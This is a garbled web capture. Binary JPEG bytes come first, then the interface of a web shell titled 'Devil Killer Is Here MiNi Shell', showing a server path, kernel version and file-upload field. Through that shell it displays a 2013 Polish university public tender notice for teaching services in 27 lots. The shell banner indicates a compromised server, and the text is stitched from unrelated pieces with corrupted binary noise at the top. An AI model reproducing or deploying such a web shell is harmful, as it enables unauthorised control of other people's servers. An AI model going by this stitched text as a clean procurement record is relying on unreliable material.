JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131004/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131004/404278-N-2013.html

<p class="kh_header"><b>Lublin: Prowadzenie zajęć dydaktycznych w ramach projektu UMCS dla rynku pracy i gospodarki opartej na wiedzy</b><br>
<b>Numer ogłoszenia: 404278 - 2013; data zamieszczenia: 04.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Marii Curie-Skłodowskiej , Pl. M. Curie-Skłodowskiej 5, 20-031 Lublin, woj. lubelskie, tel. 081 5375965, faks 081 5375965.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umcs.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie zajęć dydaktycznych w ramach projektu UMCS dla rynku pracy i gospodarki opartej na wiedzy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przediotem zamówienia jest prowadzenie zajęć dydaktycznych na innowacyjnych specjalnościach/specjalizacjach w ramach projektu UMCS dla rynku pracy i gospodarki opartej na wiedzy oraz przygotowanie kompletu materiałów dydaktycznych do prowadzonych zajęć, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.
Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 1 do SIWZ. Zamawiający dopuszcza składanie ofert częściowych w liczbie 27 części..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających. Wartość zamówienia uzupełniającego nie przekroczy 50% wartości zamówienia podstawowego i polegać będzie na powtórzeniu tego samego rodzaju zamówienia dla każdej części</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 27.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>część 1	Wykształcenie min. doktor nauk humanistycznych lub ścisłych	1. dodatkowo wykształcenie informatyczne, matematyczno-informatyczne i/lub ukończone kursy i szkolenia z zakresu nowoczesnych technologii informatycznych
2. min. 100 godzin doświadczenia w prowadzeniu przedmiotów informatycznych/ prowadzeniu kursów i szkoleń dla dorosłych z zakresu: tworzenie stron i aplikacji internetowych, pozycjonowanie stron, struktura strony internetowej, podstawowe języki projektowania stron),
3. znajomość języka programowania Python, frameworku do tworzenia aplikacji www Django
część 2	Wykształcenie minimalne: wyższe magisterskie	1.  minimum trzyletnie doświadczenie w pracy dydaktycznej na uczelni wyższej w zakresie przedmiotów z zakresu edytorstwa komputerowego, internetowego i twórczego projektowania w mediach (m.in. elektronicznych) 
2. minimum 100 godzinne doświadczenie w prowadzeniu laboratoryjnych zajęć z zakresu szkolenia komputerowego
3. doświadczenie zawodowe w zakresie projektowania graficznego (wykonanie min. jednego, autorskiego projektu graficznego np. logotyp);
4. znajomość i doświadczenie dydaktyczne w zakresie programów: Photoshop, InDesign, Illustrator, Gimp, Excel, Access, Word, PowerPoint
część 3	Wykształcenie min. doktor nauk humanistycznych lub ścisłych	1. min. 100 godzin doświadczenia w prowadzeniu kursów i szkoleń dla dorosłych w zakresie różnorodnego zastosowania TI (w szczególności grafika komputerowa, infografika, webdesign, tworzenie aplikacji webowych, DTP, etc.), 
2. min. 3 letnie doświadczenie zawodowe zdobyte podczas współpracy z firmami i przedsiębiorcami (w szczególności  doradztwo z zakresu wykorzystania technologii informatycznych w przedsiębiorstwie, budowanie e-wizerunku firmy, tworzenie wizualizacji firmy oraz projektowanie stron internetowych, promocja i e-promocja produktów i usług),
3. min. 3 letnia współpraca z agencjami reklamowymi, drukarniami, wydawnictwami oraz biurami projektowymi w zakresie projektowania i wykonawstwa materiałów drukowanych i na wyświetlacze z wykorzystaniem nowoczesnych technik graficznych i technologii;
4. znajomość języka programowania Python, frameworku do tworzenia aplikacji www Django
część 4	Wykształcenie min. doktor habilitowany nauk humanistycznych	1.  minimum 5-letnie, doświadczenie dydaktyczne związane z prowadzeniem wykładów konwersatoriów oraz warsztatów z zakresu teorii komunikowania masowego, komunikacji interpersonalnej i masowej, public relations, reklamy, komunikacji medialnej i politycznej oraz z zajęciami i ze szkoleniami w zakresie e-lerningu oraz redakcji i edycji  tekstu 
2.  przygotowanie minimum po jednym programie nauczania, sylabusie, ekspertyzie, materiałów dydaktycznych z zakresu różnych form komunikacji społecznej
3. opublikowanie przynajmniej 5 prac z zakresu komunikowania społecznego
część 5	Wykształcenie min. doktor habilitowany nauk humanistycznych	1.	 minimum 5-letnie, doświadczenie dydaktyczne związane z prowadzeniem wykładów i konwersatoriów z pragmatyki językowej, wiedzy o komunikacji językowej, języka mediów, public relations i reklamy 
2.	przygotowanie minimum jednego programu nauczania i/lub sylabusa z zakresu różnych form komunikacji językowej i pragmatyki językowej
3.	opublikowanie przynajmniej 5 prac z zakresu pragmatyki językowej i/ lub języka komunikacji społecznej
część 6	Wykształcenie minimalne: wyższe magisterskie	1. przeprowadzenie min. 100 godzin szkoleń z zakresu autoprezentacji w ciągu ostatnich 3 lat,
2. przygotowanie min. jednego programu nauczania lub/i ekspertyzy lub/i opracowania lub/i sylabusa z zakresu wystąpień publicznych 
3. doświadczenie w zakresie retoryki potwierdzone np. odbytym kursem, certyfikatem lub podobnym.
część 7	Minimalny stopień naukowy - doktor z zakresu nauk humanistycznych	1. minimum 5 publikacji o tematyce bałkańskiej (dot. bałkańskiej polityki, kultury i oświaty).
2. przygotowanie minimum po jednym programie nauczania lub/i ekspertyzy lub/i opracowania lub/i sylabusa z zakresu historii i polityki Bałkanów
3. min. 5 letnie doświadczenie dydaktyczne na uczelni wyższej
część 8	Wykształcenie minimalne: wyższe magisterskie	1. minimum 4-letnie doświadczenie w tym w zakresie ochrony własności intelektualnej oraz prawa autorskiego i prasowego;
2. przygotowanie minimum 5 programów nauczania lub/i ekspertyz lub/i opracowań lub/i sylabusów;
3. minimum 3 publikacje z zakresu prawa autorskiego.
część 9	Minimalny stopień naukowy - doktor z zakresu nauk humanistycznych	1.	Minimum 5 lat doświadczenia zawodowego na uczelni wyższej;
2.	Minimum 200 godzin zajęć z zakresu np: z antropologii widowisk i antropologii słowa; zajęcia z antropologii kulturowej poświęcone czytaniu przestrzeni miejskich oraz zajęcia z teatrologii lub równoważne;
3.	Znajomość tematyki poparta publikacja min. 2 artykułów naukowych
część 10 	Wykształcenie minimalne: wyższe magisterskie	1.	minimum 3 letnie doświadczenie praktyka w prowadzeniu pracowni fotograficznej, 
2.	znajomość zagadnień związanych z fotografią (klasyczne techniki fotograficzne) 
3.	praktyczna umiejętność prowadzenia akcji promocyjnych fotografii - wystawy, spotkania autorskie, warsztaty, publikacje poparte zorganizowaniem minimum 2 plenerów fotograficznych lub/i 2 wystaw fotograficznych; udział w minimum 2 plenerach i/lub 2 wystawach fotograficznych w charakterze autora prac, 
4.	min. jedna publikacja w piśmie branżowym, dobra znajomość sprzętu fotograficznego oraz zasad jego działania.
część 11	Wykształcenie minimalne: wyższe magisterskie	1.	autorstwo min. 30 wystaw indywidualnych, 
2.	praktyczna umiejętność prowadzenia akcji promocyjnych fotografii - warsztaty, kampanie bill bordowe, 
3.	min. 200 godzin zajęć dydaktycznych z zakresu fotografii,
4.	doświadczenie w ocenianiu fotograficznych prac konkursowych w charakterze jury.
część 12	Wykształcenie minimalne: wyższe magisterskie	1.	minimum 5 lat doświadczenia zawodowego w pracy w instytucjach kultury, 
2.	minimum 50-godzinne doświadczenie w prowadzeniu zajęć dydaktycznych lub szkoleń dla osób młodzieży i/lub dorosłych,
3.	doświadczenie w organizowaniu ogólnopolskich imprez kulturalnych (organizacja minimum 5 imprez kulturalnych w ostatnich 5 latach).
część 13	Wykształcenie minimalne: wyższe magisterskie	1. Posiadanie wiedzy z zakresu możliwości praktycznych zastosowań wybranych serwisów WEB 2.0;
2. Minimum 100-godzinne doświadczenie w prowadzeniu zajęć/ kursów dla osób dorosłych z zakresu WEB 2.0;
3. przygotowanie metodyki nauczania uwzględniającej specyfikę rzeczywistości wirtualnej (trójwymiarowość, multimedialność, specyficzna nawigacja, mechanizmy WEB 2.0)
4. Minimum 3 publikacje lub artykuły nt. WEB 2.0 i/lub Secend Life, i/lub e-learningu
5. doświadczenie w tworzeniu/ współtworzeniu minimum jednego portalu społecznościowego
część 14	Wykształcenie minimalne: wyższe magisterskie	1. Minimum 3 lata doświadczenia/ praktyki w  zakresie: 
- webdesign - projektowanie i programowanie stron (wykonanie co najmniej 2 stron internetowych)
- projektowanie graficzne/ tworzenie multimediów
- przygotowywania projektów graficznych do druku np. plakatów, ulotek, gazet, wizytówek itp.
 2. Minimum 200 godzin prowadzenia zajęć w zakresie grafiki komputerowej i sieciowej dla osób dorosłych;
3. Biegła znajomość wykorzystania programu Adobe Photoshop.
część 15	Minimalny stopień naukowy - doktor z zakresu nauk humanistycznych	1.  Minimum 5 lat doświadczenia zawodowego na Uczelni Wyższej;
2.  Minimum 5 lat doświadczenia w zakresie przygotowywanie i prowadzenia kursów akademickich w środowisku elektronicznym (cały wykład w formie on-line).
3.  Znajomość tematyki związanej z zagadnieniem sztucznej inteligencji, immersyjności, immaterialności, teleobecności poparta publikacją minimum 1 książki i/lub 5 artykułów naukowych.
część 16 	stopień naukowy co najmniej doktor z zakresu nauk humanistycznych	1.	min. 5 letnie doświadczenie dydaktyczne na uczelni wyższej,
2.	minimum 10 publikacji o tematyce genderowej oraz o relacjach gender - nowe media
część 17	Wyższe z translatoryki (niemiecki- polski) lub lingwistyki stosowanej w specjalizacji translatorskiej niemiecki- polski lub filologii germańskiej 	1. minimum czteroletnie doświadczenie dydaktyczne w roli nauczyciela w zakresie praktycznej nauki języka niemieckiego
2. preferowane  dodatkowe doświadczenie z zakresu dydaktyki translacji
część 18	1. wyższe z translatoryki lub filologii niemieckiej
2. poświadczone ukończenie kursu lub studiów tłumaczeniowych (w tym doktoranckich wraz z uzyskaniem tytułu doktora w specjalizacji translatorskiej)	1) minimum czteroletnie doświadczenie w zakresie dydaktyki translacji lub wiedzy specjalistycznej na potrzeby tłumaczenia. Minimalny okres doświadczenia może obejmować dydaktykę akademicką i poza akademicką.
2) minimum czteroletnie doświadczenie w wykonywaniu zawodu tłumacza (wolny zawód lub etat, tłumaczenia pisemne lub ustne PL NIEM.) w zakresie przynajmniej dwóch z określonych poniżej dziedzin specjalistycznych: 
1. prawo (dowolny dział, także teoria prawa), 2. biznes i funkcjonowanie przedsiębiorstw i gospodarka (makroekonomia), 3. medycyna (dowolny dział) lub profilaktyka medyczna lub technika medyczna, 4. technika w tym głównie technologie teleinformatyczne, 5. energetyka i ekologia. 
3) umiejętność wykorzystywania elektronicznych środków wyszukiwania, gromadzenia i wykorzystywania wiedzy specjalistycznej
część 19	1. wyższe z filologii polskiej
2. poświadczone ukończenie kursu lub studiów z retoryki praktycznej języka polskiego (w tym doktoranckich) lub z tytułem doktora w zakresie filologii polskiej	1. minimum trzyletnie doświadczenie w zakresie nauczania retoryki praktycznej języka polskiego w ramach kształcenia uniwersyteckiego
2. minimum roczne doświadczenie zawodowe jako konsultant ds. komunikacji językowej w biznesie (retoryka praktyczna, kultura języka i pokrewne)
3. wskazane, ale nie konieczne, doświadczenie we współpracy z tłumaczami ustnymi lub udział w programach kształcenia tłumaczy
część 20	- wyższe z translatoryki (niemiecki-polski), lingwistyki stosowanej w specjalizacji translatorskiej niemiecki-polski lub filologii germańskiej
- w przypadku ukończenia studiów na kierunku filologia niemieckiej konieczne potwierdzenie ukończenia specjalizacji translatorskiej lub ukończenia dodatkowego kursu (min. 120h) z zakresu tłumaczenia ustnego  	1. minimum czteroletnie doświadczenie dydaktyczne w roli nauczyciela, najlepiej (ale nie koniecznie) w zakresie dydaktyki translacji
2. minimum pięcioletnie doświadczenie w wykonywaniu zawodu tłumacza (wolny zawód lub etat, tłumaczenia pisemne lub ustne PL NIEM.) w zakresie określonych poniżej dziedzin specjalistycznych: 
1) Debaty polityczne i społeczne (w tym debaty na poziomie UE i/lub organizacji międzynarodowych) lub/i 
2) Zagadnienia związane ze stosunkami międzynarodowymi i bezpieczeństwem narodowym lub/i
3) Zagadnienia związane z funkcjonowaniem państwa i międzynarodowych organizacji politycznych lub/i
4) Zagadnienia związane z polityką społeczną i geografią polityczną
część 21	1.	wyższe z translatoryki (angielski- polski) lub lingwistyki stosowanej w specjalizacji translatorskiej angielski - polski lub filologii angielskiej	1. minimum czteroletnie doświadczenie dydaktyczne w roli nauczyciela w zakresie praktycznej nauki języka angielskiego
2. preferowane  dodatkowe doświadczenie z zakresu dydaktyki translacji
część 22	1. wyższe z translatoryki lub filologii angielskiej
2. poświadczone ukończenie kursu lub studiów tłumaczeniowych (w tym doktoranckich wraz z uzyskaniem tytułu doktora w specjalizacji translatorskiej)
		1) minimum czteroletnie doświadczenie w zakresie dydaktyki translacji lub wiedzy specjalistycznej na potrzeby tłumaczenia. Minimalny okres doświadczenia może obejmować dydaktykę akademicką i poza akademicką.
2) minimum czteroletnie doświadczenie w wykonywaniu zawodu tłumacza (wolny zawód lub etat, tłumaczenia pisemne lub ustne PL ANG.) w zakresie przynajmniej dwóch z określonych poniżej dziedzin specjalistycznych: 
1. prawo (dowolny dział, także teoria prawa), 2. biznes i funkcjonowanie przedsiębiorstw i gospodarka (makroekonomia), 3. medycyna (dowolny dział) lub profilaktyka medyczna lub technika medyczna, 4. technika w tym głównie technologie teleinformatyczne, 5. energetyka i ekologia. 
3) umiejętność wykorzystywania elektronicznych środków wyszukiwania, gromadzenia i wykorzystywania wiedzy specjalistycznej
część 23	1. wyższe z filologii polskiej
2. poświadczone ukończenie kursu lub studiów z retoryki praktycznej języka polskiego (w tym doktoranckich) lub z tytułem doktora w zakresie filologii polskiej 	1. minimum trzyletnie doświadczenie w zakresie nauczania retoryki praktycznej języka polskiego w ramach kształcenia uniwersyteckiego
2. minimum roczne doświadczenie zawodowe jako konsultant ds. komunikacji językowej w biznesie (retoryka praktyczna, kultura języka i pokrewne)
3. wskazane, ale nie konieczne, doświadczenie we współpracy z tłumaczami ustnymi lub udział w programach kształcenia tłumaczy
część 24	1.	wyższe
stopień naukowy: min. doktor nauk humanistycznych w zakresie bibliologii lub/i informatologii	1.	praca w charakterze nauczyciela akademickiego, min. 5 lat,
2.	biegła znajomość problematyki Web-u 2.0 oraz zastosowania poszczególnych narzędzi tego zjawiska w instytucjach kultury,
3.	Minimum 3 publikacje naukowe dotyczące Web-u 2.0, telewizji internetowej, bibliotek cyfrowych, internetowych archiwów, konwergencji mediów, zastosowania interaktywnych narzędzi w ramach funkcjonowania instytucji nauki i kultury,
4.	Minimum 100 godzin doświadczenia w prowadzeniu zajęć dotyczących technologii informacyjnych, cyfrowych repozytoriów i bibliotek, oprogramowania dla instytucji organizujących zasoby informacyjne (np. bibliotek),
5.	doświadczenie w tworzeniu blogów, stron internetowych,  tematycznych katalogów internetowych oraz Subject Gatewaya (min. 2)
część 25	1.	wyższe, kierunek: historia oraz informacja naukowa i bibliotekoznawstwo minimum magister,
2.	udokumentowana [świadectwa, certyfikaty] edukacja w zakresie/specjalności: administrator systemów sieciowych
	1.	praca w charakterze nauczyciela akademickiego lub uczestnika studiów doktoranckich - min. 2 lata,
2.	praktyczna znajomość obsługi programów do tworzenia stron i portali internetowych. 
3.	doświadczenie w projektowaniu stron, portali internetowych (minimum 3 )
4.	doświadczenie w administrowaniu stronami www (minimum 3)
5.	znajomość zagadnień prawnych dot. ochrony własności intelektualnej
część 26	1. Wykształcenie min. doktor nauk o ziemi w zakresie geografii 
2. specjalność kartografia	- minimum 5 publikacji z zakresu kartografii
- doświadczenie dydaktyczne w prowadzeniu zajęć na uczelni minimum 5 lat
- doświadczenie w praktycznym wykonywaniu prac z zakresu danych przestrzennych i kartografii mobilnej (łącznie  3 prace)
część 27	1. Wykształcenie min. doktor nauk o ziemi w zakresie geografii 
2. specjalność kartografia	- minimum 5 publikacji z zakresu kartografii
- doświadczenie dydaktyczne w prowadzeniu zajęć na uczelni minimum 5 lat
- doświadczenie w praktycznym wykonywaniu prac z zakresu danych przestrzennych i kartografii mobilnej (łącznie 2 prace)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>nie dotyczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu;
2) rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy;
3) zmiany uzasadnione okolicznościami, o których mowa w art. 3571 §1 Kodeksu cywilnego; 
4) gdy zaistnieje inna okoliczność prawna, ekonomiczna lub techniczna, skutkująca niemożliwością wykonania lub należytego wykonania umowy zgodnie z SIWZ.
Warunkiem takiej zmiany jest wystąpienie okoliczności, których nie można było wcześniej przewidzieć.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.przetargi.umcs.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Marii Curie-Skłodowskiej w
Lublinie Biuro Projektu ul. Sowińskiego 12 pokój 9, 20-040 Lublin..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.10.2013 godzina 11:00, miejsce: Uniwersytet Marii Curie-Skłodowskiej w
Lublinie Biuro Projektu ul. Sowińskiego 12 pokój 9, 20-040 Lublin..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




